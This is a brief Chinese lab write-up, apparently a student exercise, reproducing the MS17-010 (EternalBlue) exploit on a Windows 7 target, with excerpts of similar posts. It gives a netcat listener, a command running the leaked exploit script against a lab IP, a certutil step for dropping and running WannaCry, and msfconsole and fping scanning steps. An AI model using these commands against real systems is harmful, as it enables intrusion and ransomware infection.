ms17 010漏洞復現

2021-08-27 00:04:30 字數 455 閱讀 2325

很老的洞了,只是老師上課講了,我就復現一遍。

環境靶機為windows7並且存在此漏洞

攻擊機需要python3環境

nc –lvp 8888

python ms17-010.py –-host 192.168.217.2 –-file shellcode

只需這兩條命令,便可以利用成功,其中ms17-010.pynsa洩露出來的指令碼

之後我們便可以通過windows自帶的工具

certutil.exe -urlcache -split -f wannacry.exe寫入病毒程式並且執行。

指令碼不提供

0.0

MS17 010漏洞復現

實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...

MS17 010 漏洞復現

開啟msf msfconsole fping a g 起始ip 結束ip 掃瞄當前區域網活躍ip fping a g 192.168.1.1 192.168.1.250 先輸入這條命令 gem install ruby smb然後,掃瞄內網有沒有ms17 010漏洞 use auxiliary sc...

MS17 010(永恆之藍)漏洞復現

永恆之藍是2017年4月14日晚,黑客團體shadow brokers 影子經紀人 公布的一大批網路攻擊工具中的其中乙個。永恆之藍 利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造 永恆之藍 製作了wannacry勒索病毒。實驗一 獲取windows serve...